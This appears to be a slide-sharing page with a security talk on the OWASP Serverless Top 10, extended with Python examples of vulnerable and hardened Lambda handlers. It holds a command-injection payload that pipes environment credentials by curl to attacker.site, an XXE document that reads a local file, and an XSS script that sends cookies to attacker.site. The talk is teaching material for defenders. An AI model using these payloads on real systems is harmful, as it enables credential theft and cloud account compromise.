Solving OWASP MSTG CrackMe using Frida
Solving OWASP MSTG CrackMe using FridaSolving OWASP MSTG CrackMe using Frida
Solving OWASP MSTG CrackMe using FridaChandrapal Badshah
 
Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)Chandrapal Badshah
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINTChandrapal Badshah
 

More from Chandrapal Badshah (10)

Dangling DNS records takeover at scale
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scale
 
Detecting secrets in code committed to gitlab (in real time)
Detecting secrets in code committed to gitlab (in real time)Detecting secrets in code committed to gitlab (in real time)
Detecting secrets in code committed to gitlab (in real time)
 
How to get started in InfoSec ?
How to get started in InfoSec ?How to get started in InfoSec ?
How to get started in InfoSec ?
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet version
 
OSINT Mindset to protect your Organization
OSINT Mindset to protect your OrganizationOSINT Mindset to protect your Organization
OSINT Mindset to protect your Organization
 
Solving OWASP MSTG CrackMe using Frida
Solving OWASP MSTG CrackMe using FridaSolving OWASP MSTG CrackMe using Frida
Solving OWASP MSTG CrackMe using Frida
 
Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINT
 
Web Application Firewall
Web Application FirewallWeb Application Firewall
Web Application Firewall
 
Netcat - A Swiss Army Tool
Netcat - A Swiss Army ToolNetcat - A Swiss Army Tool
Netcat - A Swiss Army Tool
 

Recently uploaded

Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalLionel Briand
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsChristian Birchler
 
Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Mater
 
英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作qr0udbr0
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsSafe Software
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtimeandrehoraa
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 
Cyber security and its impact on E commerce
Cyber security and its impact on E commerceCyber security and its impact on E commerce
Cyber security and its impact on E commercemanigoyal112
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Natan Silnitsky
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...Technogeeks
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...OnePlan Solutions
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样umasea
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprisepreethippts
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfMarharyta Nedzelska
 
Machine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringMachine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringHironori Washizaki
 
PREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING  RIVER  WATER QUALITY  ppt presentationPREDICTING  RIVER  WATER QUALITY  ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentationvaddepallysandeep122
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
 

Recently uploaded (20)

Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive Goal
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
 
Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)
 
英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data Streams
 
2.pdf Ejercicios de programación competitiva
2.pdf Ejercicios de programación competitiva2.pdf Ejercicios de programación competitiva
2.pdf Ejercicios de programación competitiva
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtime
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
Cyber security and its impact on E commerce
Cyber security and its impact on E commerceCyber security and its impact on E commerce
Cyber security and its impact on E commerce
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
 

OWASP Serverless Top 10

  • 2. About me Chandrapal Badshah Security Enthusiast Build, Break, Build guy Would love to talk about plants ;) Contact: ● twitter.com/@bnchandrapal ● github.com/Chan9390
  • 3. START WITH WHY - Simon Sinek
  • 4. Once upon a time... Database Web Server CPU Memory Web Application Static Files
  • 6. But ... Database Web Server CPU Memory Web Application Static Files Security: maintaining/updating operating system with security patches, WAF/firewall configuration, network monitoring, etc
  • 9. Introduction to Microservices Still a lot of manual work (depending on the deployment method) to scale it. Security tasks depend on the deployment method too.
  • 10. Introduction to Serverless The phrase “serverless” doesn’t mean servers are no longer involved. It simply means that developers no longer have to think that much about them. Computing resources get used as services without having to manage around physical capabilities or limits. https://readwrite.com/2012/10/15/why-the-future-of-software-and-apps-is-serverless/
  • 13. Serverless Tools & Frameworks
  • 14. Who uses Serverless (AWS Lambda) https://aws.amazon.com/lambda/resources/customer-case-studies/
  • 15. Features of Function-as-a-Service ➔ Stateless functions ➔ Complete abstraction of the underlying servers ➔ Instant, scalable and event-driven ➔ Pay for what you use ➔ Free tier (AWS Lambda gives 1,000,000* requests for free every month) ➔ There is a default timeout (and a provider-imposed maximum) ➔ The function guidelines (runtime, package size, memory, timeout) are defined by the cloud service provider ➔ Multiple languages supported
  • 16. DEMO - Deploying Serverless App
  • 21. Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ?
  • 22. Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ? ● The way the apps are created is similar to that of server-based applications ● There’s not a lot of data from organizations on how they use serverless functions in production (and the security issues they faced)
  • 23. Let’s jump into OWASP Serverless Top 10
  • 24. A1: Injection ● Serverless functions don’t only take HTTP triggers; they also fire on cloud storage events, database changes, queue/notification messages, inbound email, etc., so every one of those event payloads is attacker-influenced input ● SQL/NoSQL injection ● OS command injection ● Code injection ● The severity depends on the permissions (execution role) given to the vulnerable function
  • 25. An example scenario: CV filtering system User sends mail with CV attached Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it if there’s a PDF attachment
  • 26. Can you see the bug ?
  • 27. ● Checks that the attachment has a file name ● Checks that the file name ends with .pdf ● Prefixes the file name with /tmp ● Executes the pdftotext command through a shell with that path on the command line (the sender controls the file name, so the sender controls part of the command)
  • 28. Payload (to print the environment variables): foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf ● The .pdf suffix check still passes because # comments out the rest of the shell line ● In AWS Lambda the environment holds the execution role’s temporary credentials (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN), so this dump hands the attacker whatever the function’s role is allowed to do
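The CV-filtering handler on slides 25–28, written out in Python as an added example (this is not the deck’s code; the function names, the `/tmp` layout and the sample attachment names are assumed). The vulnerable path builds the shell line exactly the way the slide describes, so the payload’s `;env|curl … #` survives the suffix check; the hardened path allow-lists the name and hands `pdftotext` an argv list with no shell in between.

```python
import re
import shlex
import subprocess

# Constructed sample inputs: attachment names exactly as set in the inbound mail.
# The first has the shape of the slide's payload: the shell runs 'env', pipes it
# to curl, and '#' comments out the rest so the trailing '.pdf' still satisfies
# a suffix check.
MALICIOUS_NAME = ('foobar;env|curl -H "Content-Type: text/plain" -X POST '
                  '-d @- http://attacker.site/collector #.pdf')
BENIGN_NAME = "jane_doe_cv.pdf"
TMP_DIR = "/tmp"  # assumed scratch directory, as on the slide


def naive_accepts(filename):
    """The check the vulnerable handler makes: a name is present and ends in .pdf."""
    return bool(filename) and filename.endswith(".pdf")


def vulnerable_command(filename):
    """The shell line the vulnerable handler builds for os.system()/shell=True.
    Returned as a string, never executed here, so the injection is visible."""
    return f"pdftotext {TMP_DIR}/{filename} {TMP_DIR}/out.txt"


# Allow-list: one path component, safe characters only, .pdf suffix in any case.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}\.pdf$", re.IGNORECASE)


def hardened_accepts(filename):
    """Validate the sender-controlled name against an allow-list instead of a
    suffix check: no shell metacharacters, no spaces, no path separators, no '..'."""
    if not filename or SAFE_NAME.match(filename) is None:
        return False
    return ".." not in filename and "/" not in filename and "\\" not in filename


def hardened_argv(filename):
    """Build the pdftotext invocation as an argv list. With no shell involved,
    ';', '|' and '#' are just bytes in a filename, not operators."""
    if not hardened_accepts(filename):
        raise ValueError("attachment name rejected")
    return ["pdftotext", f"{TMP_DIR}/{filename}", "-"]


def extract_text(filename, timeout=30):
    """Run the conversion without a shell and with its own timeout, so a stuck
    child cannot consume the whole Lambda deadline. Not called by the demo."""
    result = subprocess.run(hardened_argv(filename), capture_output=True,
                            timeout=timeout, check=True)
    return result.stdout.decode("utf-8", errors="replace")


if __name__ == "__main__":
    print(naive_accepts(MALICIOUS_NAME))        # True: the suffix check passes
    print(vulnerable_command(MALICIOUS_NAME))   # 'env|curl ...' is now on the line
    print(hardened_accepts(MALICIOUS_NAME))     # False
    print(hardened_argv(BENIGN_NAME))
    # If a shell genuinely had to stay, shlex.quote() is the minimum, but the
    # argv form above removes the whole class of bug rather than one payload.
    print("pdftotext " + shlex.quote(f"{TMP_DIR}/{MALICIOUS_NAME}"))
```

Validating the name is the second line of defence; the first is not using the sender’s name for the on-disk path at all (write the bytes to a name you generate). Either way, keep the function’s role to the minimum the conversion needs, because the `env` dump above is only as valuable as that role.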
  • 29. A2: Broken Authentication ● Functions are stateless, so every invocation has to establish on its own who the caller is ● Multiple entry points, services, events and triggers and no continuous flow: things can get worse ● Common example: functions meant for internal use only are reachable by everyone (an HTTP endpoint deployed with no authorizer in front of it)
  • 30. A3: Sensitive Data Exposure ● Depends on the architecture, just like other server-based applications ● Common example: functions disclosing logs at some specific endpoint
  • 31. A bug I recently found
  • 32. A4: XML External Entity ● Insecure way of parsing XML files by the serverless function (a parser configured to resolve external entities) ● Exploitation is not always fruitful: the resolved entity has to reach somewhere the attacker can read it (a response, a log, a stored result) or be exfiltrated out of band
  • 34. Vulnerable code … Downloads the XML file from the bucket and parses it.
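The bucket-triggered parse from slide 34, as an added Python example that is not the deck’s code. The object downloaded from the bucket is replaced by a constructed byte string, and the “secret” the entity reads is a temp file the demo creates itself (in Lambda the real targets would be `/proc/self/environ` or files in the deployment package). The vulnerable parser is `xml.sax` with external general entities enabled, which was the default before the 2018 fix and is one `setFeature` call away from it now; the hardened parser rejects any DTD up front and then uses `ElementTree`, which does not resolve external entities.

```python
import io
import os
import tempfile
import xml.etree.ElementTree as ET
import xml.sax
from xml.sax.handler import feature_external_ges

# Constructed stand-in for a secret on the function's filesystem.
SECRET = "db-password-from-local-file"


def write_secret_file():
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(SECRET)
    return path


def build_xxe_document(target_path):
    """The 'CV' an attacker uploads to the bucket: a DTD declaring an external
    entity that points at a local file, referenced inside the document body."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE cv [<!ENTITY xxe SYSTEM "file://{target_path}">]>\n'
        "<cv><name>&xxe;</name></cv>"
    )


class TextCollector(xml.sax.ContentHandler):
    """Collects every text node, which is where the resolved entity lands."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def vulnerable_parse(xml_bytes):
    """xml.sax with external general entities switched on: the parser fetches
    the file:// URL and splices its contents into the document text."""
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


def hardened_parse(xml_bytes):
    """Two layers: an uploaded CV has no business carrying a DTD, so refuse any
    document that declares one; then parse with ElementTree, which never
    resolves external entities and raises ParseError on an undefined one."""
    if b"<!DOCTYPE" in xml_bytes or b"<!ENTITY" in xml_bytes:
        raise ValueError("DTD/entity declarations are not accepted")
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        raise ValueError(f"malformed CV: {exc}") from exc
    return root.findtext("name") or ""


def run_demo():
    """Create the local secret, build the malicious upload, parse it both ways,
    clean up. Returns (text the vulnerable parser produced, hardened rejected?)."""
    secret_path = write_secret_file()
    try:
        doc = build_xxe_document(secret_path).encode()
        leaked = vulnerable_parse(doc)
        try:
            hardened_parse(doc)
            rejected = False
        except ValueError:
            rejected = True
    finally:
        os.remove(secret_path)
    return leaked, rejected


if __name__ == "__main__":
    leaked, rejected = run_demo()
    print("vulnerable parser returned:", leaked)          # contains SECRET
    print("hardened parser rejected the upload:", rejected)
```

The byte-level DOCTYPE check is deliberately coarse (a UTF-16 document would slip past it); the parser choice is the real control, and for a parser you do not fully control the usual answer is the `defusedxml` package, which disables DTD processing and entity expansion across the standard-library parsers.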
  • 37. A5: Broken Access Control ● Over-privileged functions ● If a function is allowed to access anything in the cloud account, then so is an attacker who exploits a vulnerability such as code execution in it: the blast radius of a bug is the function’s role, not the function
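What “over-privileged” looks like on the role attached to a function, with a small audit that flags it, as an added Python example (not the deck’s code; the bucket names, log group and the function name `cv-parser` are made up). The first policy is the “just make it work” role, the second grants only what the CV parser from slide 25 actually does, and the third looks scoped but contains a path from code execution in one function to any role in the account.

```python
import json

# Constructed IAM role policies for the CV-parsing function.
OVER_PRIVILEGED = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
})

LEAST_PRIVILEGE = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::example-inbound-mail/*"},
        {"Effect": "Allow", "Action": ["s3:PutObject"],
         "Resource": "arn:aws:s3:::example-parsed-cvs/text/*"},
        {"Effect": "Allow", "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": "arn:aws:logs:*:*:log-group:/aws/lambda/cv-parser:*"},
    ],
})

# Scoped on paper, but iam:PassRole + lambda:CreateFunction lets a compromised
# function deploy new code under any role it can pass.
ESCALATION_PATH = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:Get*"],
         "Resource": "arn:aws:s3:::example-inbound-mail/*"},
        {"Effect": "Allow", "Action": ["iam:PassRole", "lambda:CreateFunction"],
         "Resource": "*"},
    ],
})

# Actions that let a compromised function widen its own permissions.
ESCALATION_ACTIONS = {
    "iam:PassRole", "iam:CreateAccessKey", "iam:AttachRolePolicy",
    "iam:PutRolePolicy", "iam:CreatePolicyVersion", "iam:UpdateAssumeRolePolicy",
    "lambda:CreateFunction", "lambda:UpdateFunctionCode",
    "lambda:UpdateFunctionConfiguration", "sts:AssumeRole",
}


def _as_list(value):
    # IAM allows a single string or a list in Statement, Action and Resource.
    return value if isinstance(value, list) else [value]


def audit_policy(policy_json):
    """Return (statement index, finding) pairs for Allow statements that are
    wildcarded, use NotAction, or grant escalation actions. An empty list means
    nothing was flagged, not that the policy is minimal."""
    findings = []
    statements = _as_list(json.loads(policy_json)["Statement"])
    for i, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue
        if "NotAction" in stmt:
            findings.append((i, "NotAction allows everything not listed"))
        for action in _as_list(stmt.get("Action", [])):
            if "*" in action:
                findings.append((i, f"wildcard action {action!r}"))
            elif action in ESCALATION_ACTIONS:
                findings.append((i, f"escalation action {action!r}"))
        if "*" in _as_list(stmt.get("Resource", [])):
            findings.append((i, "Resource '*'"))
    return findings


if __name__ == "__main__":
    for name, policy in [("over-privileged", OVER_PRIVILEGED),
                         ("least-privilege", LEAST_PRIVILEGE),
                         ("escalation-path", ESCALATION_PATH)]:
        print(name, audit_policy(policy))
```

One role per function is the practical rule: a shared “lambda-role” that accumulates every team’s needs is how the first policy comes about, and the command injection from slide 28 then inherits all of it.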
  • 38. A6: Security Misconfiguration ● Not just the function, but how the function interacts with its environment ● Because of the complexity introduced by the growing number of features/functions, misconfiguration is very easy ● Can lead to DoS/timeouts (timeout and concurrency settings) ● Example: public S3 buckets
  • 39. A7: Cross Site Scripting (XSS) ● The most common bug affects serverless functions as well ● Mostly due to rendering untrusted input (from any trigger, not only HTTP) without sanitization/output encoding
  • 40. Find the bug… (scenario) User sends mail Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it and sends the message content to moderator dashboard
  • 42. Find the bug… Gets the message content Sends the message content to dashboard
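The moderator-dashboard scenario from slides 40–42, as an added Python example rather than the deck’s code. The mail is a constructed dict in the shape the SNS notification would deliver; the dashboard row is built two ways. The point the slide does not show is that the same mail content ends up in two contexts, a text node and a quoted attribute, and that `html.escape(..., quote=True)` covers both.

```python
import html

# Constructed mail as the function receives it. The sender controls every field.
MAIL = {
    "from": "applicant@example.com",
    "subject": 'Re: position" onmouseover="alert(document.cookie)',
    "body": "Hello,<script>fetch('https://attacker.site/?c='+document.cookie)</script>",
}


def vulnerable_row(mail):
    """String-built HTML: mail content becomes markup in the moderator's browser.
    The subject breaks out of the title attribute, the body injects a script."""
    return (f'<tr data-from="{mail["from"]}" title="{mail["subject"]}">'
            f'<td>{mail["subject"]}</td><td>{mail["body"]}</td></tr>')


def escape_for_html(value):
    """html.escape with quote=True encodes & < > " and ', so one helper is safe
    for text nodes and for double- or single-quoted attribute values. It is not
    enough for unquoted attributes, URLs or inline script; avoid those contexts."""
    return html.escape(str(value), quote=True)


def hardened_row(mail):
    e = escape_for_html
    return (f'<tr data-from="{e(mail["from"])}" title="{e(mail["subject"])}">'
            f'<td>{e(mail["subject"])}</td><td>{e(mail["body"])}</td></tr>')


def has_live_markup(rendered):
    """Crude oracle for the demo: an unescaped script tag or event handler."""
    return "<script" in rendered or '" onmouseover="' in rendered


if __name__ == "__main__":
    print(vulnerable_row(MAIL))
    print(hardened_row(MAIL))
```

Escaping at render time is the fix; a Content-Security-Policy header on the dashboard that disallows inline script is the second layer, because the same mail will be rendered again by whichever tool reads it next.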
  • 44. A8: Insecure Deserialization ● Common in Python and NodeJS, but also affects Java and dotNET ● Mostly introduced due to insecure use of 3rd party libraries
  • 46. The payload in request…
  • 48. A9: Using components with known vulnerabilities ● Using dependencies that are insecure ● Most commonly found ● Not every vulnerability will affect serverless functions ● Doesn’t always guarantee remote exploitation
  • 49. A10: Insufficient Logging and Monitoring ● Serverless auditing is even more difficult than for traditional web applications ● Since clients and event sources interact directly with the functions, there is often no place to put a WAF or any active monitoring system (a WAF in front of an API gateway covers HTTP triggers only; storage, queue and mail triggers bypass it) ● This actually helps attackers
  • 52. Lambda Logs (in case of huge payload)
  • 53. Resources OWASP Serverless Top 10: https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project OWASP Serverless Top 10 GitHub repo: https://github.com/OWASP/Serverless-Top-10-Project Serverless Security - Function-as-a-Service: https://www.youtube.com/watch?v=c5ZHPc_yG4g Securing Serverless Applications Step-by-step: https://www.youtube.com/watch?v=B3j4xql7we0 AWS Serverless Functions: https://github.com/aws-samples/aws-serverless-workshops PureSec Serverless Top 10: https://github.com/puresec/sas-top-10
  • 54. Stay tuned ! Damn Vulnerable Serverless App on its way

Editor's Notes

  1. The control was with the server. (Give example, cookie is still serverside in serverless)